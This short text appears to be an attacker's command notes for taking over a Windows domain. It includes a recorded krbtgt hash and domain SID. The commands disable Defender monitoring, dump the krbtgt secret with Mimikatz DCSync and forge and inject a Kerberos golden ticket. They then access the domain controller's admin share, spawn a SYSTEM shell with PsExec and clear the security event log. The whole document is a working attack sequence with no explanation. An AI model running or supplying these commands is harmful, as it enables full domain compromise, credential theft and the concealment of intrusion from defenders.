
S-1-5-21-1101470987-2015192894-423010698


28e9abd038842dace3d1fe10368ab7ef
Set-MpPreference -DisableRealtimeMonitoring $true
lsadump::dcsync /domain:cs2b23.net /user:krbtgt

kerberos::golden /domain:cs2b23.net /sid:S-1-5-21-1101470987-2015192894-423010698  /target:ws2019_dc01.net /rc4:28e9abd038842dace3d1fe10368ab7ef  /service:cifs /user:tonyhahah /ptt
kerberos::ptt ticket.kirbi
misc::cmd
dir \\ws2019_dc01\c$

PsExec.exe \\ws2019_dc01 -s powershell.exe
whoami
Clear-EventLog -LogName security -confirm
